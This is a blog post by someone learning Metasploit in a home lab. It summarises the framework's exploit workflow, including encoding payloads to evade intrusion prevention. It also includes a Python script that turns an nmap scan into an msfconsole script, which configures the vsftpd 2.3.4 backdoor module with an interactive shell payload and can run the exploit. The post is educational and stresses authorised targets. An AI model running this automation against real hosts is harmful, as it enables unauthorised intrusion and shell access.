As I continue gaining experience in my virtual lab and reading about how to conduct countless exploits, one tool shows up in nearly every scenario: Metasploit. I figured it was important to know exactly what this tool is, what it does, how it is made, and so on. Wikipedia summarizes the basic steps for exploiting a system with the Framework as follows:
- Choosing and configuring an exploit (code that enters a target system by taking advantage of one of its bugs; about 900 different exploits for Windows, Unix/Linux and Mac OS X systems are included);
- Optionally checking whether the intended target system is susceptible to the chosen exploit;
- Choosing and configuring a payload (code that will be executed on the target system upon successful entry; for instance, a remote shell or a VNC server);
- Choosing the encoding technique so that the intrusion-prevention system (IPS) ignores the encoded payload;
- Executing the exploit.
(Source: Wikipedia)
In order to carry out these steps, some information about the target is needed, and this is where recon tools such as nmap come in. The most common information needed is the operating system version and the network services that are installed and listening. A vulnerability scanner of choice can then be used to detect vulnerabilities on the target system. Metasploit can import the scanner's results into the Framework's database (for example with db_import in msfconsole, or by running db_nmap directly from the console) to identify which findings have existing exploit modules.
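The workflow above, from the recon data through "check" and "exploit", as an added example that is not part of the original post or of Metasploit itself. It parses an nmap -sV -O XML report into the host/OS/service inventory Metasploit needs and emits an msfconsole resource script (.rc) that imports the scan, lists what was found, searches for exploit modules per service and, where a module is known, configures it and runs `check` before (optionally) `exploit`. The XML is constructed sample data, not a real scan, and the KNOWN_MODULES table is an assumed lookup for illustration; in a real engagement the module is chosen with `search` inside msfconsole.

```python
import xml.etree.ElementTree as ET

# Constructed sample scan (no real host); shape follows nmap's -oX output.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 10.0.0.5" start="0">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="filtered"/>
        <service name="netbios-ssn"/>
      </port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
  </host>
</nmaprun>
"""

# Assumed lookup table for illustration only: (product, version) -> (module, payload).
# Real selection happens with `search` in msfconsole, not a hard-coded map.
KNOWN_MODULES = {
    ("vsftpd", "2.3.4"): ("exploit/unix/ftp/vsftpd_234_backdoor", "cmd/unix/interact"),
}


def parse_nmap_xml(xml_text):
    """Return the recon data Metasploit needs: address, OS guess and open services."""
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        osmatch = host.find("os/osmatch")
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed or filtered ports give nothing to exploit
            svc = port.find("service")
            services.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
        hosts.append({
            "addr": addr_el.get("addr"),
            "os": osmatch.get("name") if osmatch is not None else "unknown",
            "services": services,
        })
    return hosts


def search_query(service):
    """msfconsole `search` line for one service; product is the best key, else the name."""
    key = service["product"] or service["name"]
    return f"search type:exploit {key}"


def build_resource_script(hosts, scan_path, fire=False):
    """Emit an msfconsole resource script: import, enumerate, search, check, exploit.

    Resource scripts run line by line and `check` does not gate `exploit`, so the
    script stops at `check` unless fire=True; review the check output first.
    """
    lines = [
        f"db_import {scan_path}",  # load the scan into the Framework database
        "hosts",                    # what the database now knows about targets
        "services",                 # and about their listening services
    ]
    for host in hosts:
        for svc in host["services"]:
            lines.append(search_query(svc))
            module = KNOWN_MODULES.get((svc["product"].lower(), svc["version"]))
            if module is None:
                continue
            exploit, payload = module
            lines += [
                f"use {exploit}",
                f"set RHOSTS {host['addr']}",
                f"set RPORT {svc['port']}",
                f"set PAYLOAD {payload}",
                "check",  # confirm susceptibility before firing anything
            ]
            if fire:
                lines.append("exploit")
            lines.append("back")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(build_resource_script(found, "scan.xml"))
```

The generated file is fed to the console with `msfconsole -r scan.rc` after the real XML has been saved as scan.xml; the filtered port 139 is dropped because only open services are worth searching for, and the SSH service only gets a `search` line because nothing in the assumed table matches it.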
You may be wondering about the list of exploits the tool contains. The list typically contains most, if not all, of the common public exploits; however, developers can also write their own modules (in Ruby, the language the Framework itself is written in) and either load them locally from their ~/.msf4/modules directory or contribute them to the project on GitHub.
Metasploit is definitely a great tool, and because it is so popular it is important for both red team (attacker) and blue team (defender) personnel to understand it and what it contains. I highly recommend that anyone interested in security at least research this tool and run it in a VM lab such as Kali Linux, which comes with Metasploit pre-installed, against targets you own or are authorized to test. It is truly amazing how simple this tool can make exploiting a vulnerability.